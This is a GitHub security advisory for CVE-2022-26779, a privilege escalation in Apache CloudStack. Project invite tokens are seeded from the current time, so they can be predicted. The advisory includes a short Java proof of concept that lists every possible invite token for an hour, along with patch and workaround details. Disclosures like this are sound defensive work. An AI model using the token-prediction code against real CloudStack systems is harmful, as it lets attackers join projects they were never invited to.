Skip to content

apache/cloudstack: Privileged escalation due to Predictable Seed in Pseudo-Random Number Generator (PRNG) and Use of Insufficiently Random Values

Moderate
JLLeitschuh published GHSA-vpcc-9rh2-8jfp Mar 10, 2022

Package

apache/cloudstack (None)

Affected versions

<= 4.16.0.0

Patched versions

4.16.1.0

Description

Impact

Apache Cloudstack contains a privileged escalation vulnerability in the invite to project logic due to a predictable seed used in a PRNG.

Details

When inviting a user or account to a project via the email, the methods ProjectManagerImpl.inviteAccountToProject or ProjectManagerImpl.inviteUserToProject are invoked, and a random token is emailed to the invitee to allow them to join the project.

However, this random token is generated predictably using the method generateToken with the value of 10 using System.currentTimeMillis() as the seed for the random number generator.

As such, if an attacker knows around the time an invite was generated to invite another user, that attacker would be able to leverage the invite token to impersonate the invited user's invite acceptance.

The invite is stored in the database, but other than "having the secret token" there is no further checks that occur to ensure that the user taking advantage of the token is the user that the token was assigned to.

The site where the project invite is looked up form the database:

The user that is the current caller is pulled from the request here:

Then, that accepted invite is assigned to the calling user here:

As such, an attacker is able to leverage an invite a project that they were never sent because they can compute the value of the invite token.

Proof Of Concept

The following code will print out all of the possible secret tokens for the next hour:

public static String generateToken(long time, int length) {
    String charset = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
    Random rand = new Random(time);
    StringBuffer sb = new StringBuffer();
    for (int i = 0; i < length; i++) {
        int pos = rand.nextInt(charset.length());
        sb.append(charset.charAt(pos));
    }
    return sb.toString();
}

public static void main(String[] args) {
    long startTime = System.currentTimeMillis();
    LongStream
        .rangeClosed(startTime + 0, startTime + (long) (3_600_000))
        .parallel()
        .mapToObj(time -> generateToken(time, 10))
        .forEach(System.out::println);
}

Patches

Workarounds

When executing the addAccountToProject API call, don't invite by email. Only invite by existing account or user.

Mitigating Factors

project.invite.required is false by default and is something that must be enabled by end-users explicitly.

References

For more information

Open an issue with the Apache Cloudstack team here: https://github.com/apache/cloudstack/issues

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
High
Privileges required
Low
User interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
Low

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:L

CVE ID

CVE-2022-26779

Weaknesses

Credits